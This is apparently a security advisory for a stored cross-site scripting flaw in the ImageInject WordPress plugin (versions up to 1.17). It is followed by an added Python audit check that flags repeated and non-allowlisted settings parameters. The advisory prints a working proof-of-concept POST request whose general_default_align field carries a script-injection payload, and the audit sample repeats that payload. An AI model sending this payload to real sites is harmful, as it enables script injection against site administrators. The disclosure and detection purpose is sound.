wpexploit | iohex | WPEX-ID:FC1FC057-97EE-4A10-909F-2F11EAFA0BD0
Dec 02, 2022 - 12:00 a.m.

ImageInject <= 1.17 - Admin+ Stored XSS


EPSS: 0.001 (Percentile: 25.3%)

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).

POST /wp-admin/options-general.php?page=wpdf-options HTTP/1.1
Referer: http://example.com/wp-admin/options-general.php?page=wpdf-options
Cookie: [admin+]
Connection: close

_wpnonce=<nonce key>&flickr_enabled=1&flickr_license=4%2C5%2C6%2C7&flickr_sort=relevance&pixabay_enabled=1&pixabay_image_type=all&general_save_images=1&general_feat_img_size=medium&general_default_align=none&general_attr_location=caption&general_items_per_req=40&advanced_img_template=%3Cimg+title%3D%22%7Btitle%7D+by+%7Bauthor%7D%22+alt%3D%22%7Bkeyword%7D+photo%22+src%3D%22%7Bsrc%7D%22+%2F%3E&advanced_attr_template=%3Csmall%3EPhoto+by+%3Ca+href%3D%22%7Blink%7D%22+target%3D%22_blank%22%3E%7Bauthor%7D%3C%2Fa%3E+%7Bcc_icon%7D%3C%2Fsmall%3E&advanced_attr_template_multi=%3Csmall%3EPhotos+by+%7Blinklist%7D%3C%2Fsmall%3E&advanced_filename_template=%7Bfilename%7D_%7Bkeyword%7D&save_options=Save+All+Settings&general_default_align=</script><script>alert(/xss/)</script>
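
A request-audit check for the submission above, as an added example that is not part of the original advisory or the plugin's code: it resolves repeated parameters the way PHP fills $_POST (the last value wins, so the second general_default_align is the one that gets stored) and compares fixed-choice settings against an allowlist. The allowlist values other than none, the function names and the shortened sample body are assumptions.

```python
from urllib.parse import parse_qsl

# Fixed-choice settings and their permitted values. ASSUMPTION: only "none"
# appears on the page; the other alignment values are hypothetical.
FIXED_CHOICE = {"general_default_align": {"none", "left", "center", "right"}}

# Constructed sample: a shortened form of the request body shown above.
SAMPLE_BODY = (
    "_wpnonce=NONCE&general_default_align=none"
    "&advanced_attr_template_multi=%3Csmall%3EPhotos+by+%7Blinklist%7D%3C%2Fsmall%3E"
    "&save_options=Save+All+Settings"
    "&general_default_align=</script><script>alert(/xss/)</script>"
)


def effective_params(body):
    """Decode a urlencoded body the way PHP fills $_POST: for a repeated
    plain key the last value wins. Returns (params, repeated_keys)."""
    params, repeated = {}, set()
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key in params:
            repeated.add(key)
        params[key] = value
    return params, repeated


def audit_settings_post(body):
    """Return sorted (finding, key) tuples for a settings-save request body."""
    params, repeated = effective_params(body)
    findings = [("repeated-key", key) for key in repeated]
    for key, allowed in FIXED_CHOICE.items():
        # Template fields legitimately carry HTML, so only fixed-choice
        # fields are compared against an allowlist.
        if key in params and params[key] not in allowed:
            findings.append(("value-not-allowlisted", key))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_settings_post(SAMPLE_BODY):
        print(finding)
```

The same allowlist comparison belongs on the server side when the setting is saved, with escaping applied wherever the stored value is written back into the admin page.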
